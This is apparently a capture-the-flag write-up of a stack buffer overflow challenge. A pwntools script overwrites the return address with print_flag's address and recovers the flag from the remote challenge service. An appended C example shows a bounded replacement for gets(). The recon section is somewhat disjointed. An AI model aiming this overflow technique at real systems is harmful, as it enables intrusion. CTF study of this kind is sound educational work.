Category: Pwn / Binary Exploitation
Points: 500
Author: Anonymous

## Introduction

The challenge presented us with a mysterious domain: pwnhack.com. Navigating to the site revealed a minimalist text adventure titled "The Dragon's Hoard." The objective was simple: defeat the dragon to retrieve the flag. However, this wasn't your standard text-based RPG—it was a binary exploitation challenge wrapped in a fantasy skin.

## Initial Recon

We downloaded the provided binary, `dragon`, and threw it into the standard analysis pipeline.

File

```
$ objdump -d dragon | grep print_flag
0000000000401176 <print_flag>
```

The target address is `0x401176`. We need to craft a payload that looks like this:

```
[64 bytes of junk] + [8 bytes of junk (RBP)] + [Address of print_flag]
```

We can write a quick Python script using pwntools:

```python
from pwn import *

# Connect to the challenge service
p = remote('pwnhack.com', 9001)

# Wait for the prompt
p.recvuntil(b'What do you do?')
p.recvline()

# Target address
target_addr = 0x401176

# 64 bytes fill the buffer, 8 more overwrite the saved RBP,
# then the address of print_flag replaces the return address
payload = b'A' * 64 + b'B' * 8 + p64(target_addr)

p.sendline(payload)
p.interactive()
```

Running it against the remote service:

```
$ python3 exploit.py
[+] Opening connection to pwnhack.com on port 9001: Done
[*] Switching to interactive mode
> The dragon roars! What do you do?
> PwnhackDr4g0n_Sl4y3r_M4st3r_0f_Th3_St4ck
```

The "Pwnhack Dragon" was a classic introduction to stack buffer overflows. It taught us that in the world of binary exploitation, you don't always have to play by the rules. The gets() function is the dragon's weak spot—one single line of unsafe code that turns a fortress into a house of cards.
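The fix for the weak spot named above, as an added example that is not part of the original write-up or the challenge binary: a bounded replacement for the `gets()` call. `read_action()` and `read_action_from_string()` are hypothetical names; the function keeps the 64-byte buffer from ever being overrun and reports an oversized line instead of silently truncating it, which is what a patched version of the game would need.

```c
#include <stdio.h>
#include <string.h>

/* The binary did roughly `char action[64]; gets(action);`. gets() has no
 * bound, so a 64 + 8 + 8 byte line runs over the buffer, the saved RBP and
 * the return address. read_action() is the bounded replacement: it never
 * writes more than len - 1 bytes plus the NUL.
 * Returns 1 for a complete line (newline stripped), 0 at end of input, and
 * -1 when the line did not fit (excess discarded, buf still NUL-terminated). */
int read_action(char *buf, size_t len, FILE *in)
{
    if (len == 0 || fgets(buf, (int)len, in) == NULL)
        return 0;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 1;
    }
    /* No newline: EOF ended the line, or it overflowed. Drain the rest so
     * the next prompt does not re-read the leftover bytes as a new action. */
    int c, overflowed = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        overflowed = 1;
    return overflowed ? -1 : 1;
}

/* Helper to exercise read_action() on a constructed line (tmpfile is ISO C). */
int read_action_from_string(const char *text, char *buf, size_t len)
{
    FILE *in = tmpfile();
    if (in == NULL) return 0;
    fputs(text, in);
    rewind(in);
    int rc = read_action(buf, len, in);
    fclose(in);
    return rc;
}

int main(void)
{
    char action[64];   /* same 64-byte buffer the challenge overflowed */
    printf("The dragon roars! What do you do? ");
    int rc = read_action(action, sizeof action, stdin);
    if (rc == -1)
        puts("The dragon hears nothing longer than 63 characters. Try again.");
    else if (rc == 1)
        printf("You: %s\n", action);
    return 0;
}
```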